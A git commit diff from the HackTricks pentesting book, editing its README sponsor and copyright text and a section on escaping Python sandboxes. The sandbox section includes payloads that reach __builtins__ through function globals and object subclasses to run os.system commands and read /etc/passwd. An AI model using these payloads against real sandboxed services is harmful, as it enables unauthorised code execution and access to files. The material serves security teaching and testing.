GitBook: [master] 517 pages modified

This commit is contained in:
CPol 2021-10-04 11:09:20 +00:00 committed by gitbook-bot
parent 14ead4a692
commit 8625431ec6
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 23 additions and 11 deletions

View file

@ -20,8 +20,8 @@ Here you will find the **typical flow** that **you should follow when pentesting
**Click in the title to start!** **Click in the title to start!**
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)**\[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**. If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**PEASS & HackTricks telegram group here**](https://t.me/peass)**, or** follow me on Twitter ****[**🐦**](https://emojipedia.org/bird/)\*\*\*\*[**@carlospolopm**](https://twitter.com/carlospolopm).
**If you want to** share some tricks with the community **you can also submit** pull requests **to \[**[https://github.com/carlospolop/hacktricks\*\*\]\(https://github.com/carlospolop/hacktricks](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks)\) **that will be reflected in this book. **If you want to** share some tricks with the community **you can also submit** pull requests **to** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks**]%28https://github.com/carlospolop/hacktricks) **that will be reflected in this book.
Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book. Don't forget to** give ⭐ on the github\*\* to motivate me to continue developing this book.
{% hint style="danger" %} {% hint style="danger" %}
@ -32,17 +32,15 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
## Corporate Sponsors ## Corporate Sponsors
### \*\*\*\*[**INE**](https://ine.com/)\*\*\*\* ### [**INE**](https://ine.com/)
![](.gitbook/assets/ine_logo-3-.jpg) ![](.gitbook/assets/ine_logo-3-.jpg)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
\*\*\*\*[**INE**](https://ine.com/) is a great platform to start learning or **improve** your **IT knowledge** through their huge range of **courses**. I personally like and have completed many from the [**cybersecurity section**](https://ine.com/pages/cybersecurity). **INE** also provides with the official courses to prepare the **certifications** from [**eLearnSecurity**](https://elearnsecurity.com/)**.**
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
#### **Courses and Certifications reviews** #### **Courses and Certifications reviews**
@ -50,7 +48,9 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
{% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} {% page-ref page="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
\*\*\*\*
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.** **Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**

View file

@ -206,9 +206,13 @@ get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
#### Python3 #### Python3
```python ```python
# Obtain the builtins from a defined function # Obtain builtins from a globally defined function
get_flag.__globals__['__builtins__'].__import__("os").system("ls") print.__self__
dir.__self__
globals.__self__
# Obtain the builtins from a defined function
get_flag.__globals__['__builtins__']
# The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__) # The os._wrap_close class is usually loaded. Its scope gives direct access to os package (as well as __builtins__)
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls')
@ -227,6 +231,14 @@ __builtins__=([x for x in (1).__class__.__base__.__subclasses__() if x.__name__
__builtins__["__import__"]('os').system('ls') __builtins__["__import__"]('os').system('ls')
``` ```
### Builtins payloads
```python
# Possible payloads once you have found the builtins
.open("/etc/passwd").read()
.__import__("os").system("ls")
```
### Discovering loaded variables ### Discovering loaded variables
Checking the **`globals`** and **`locals`** is a good way to know what you can access. Checking the **`globals`** and **`locals`** is a good way to know what you can access.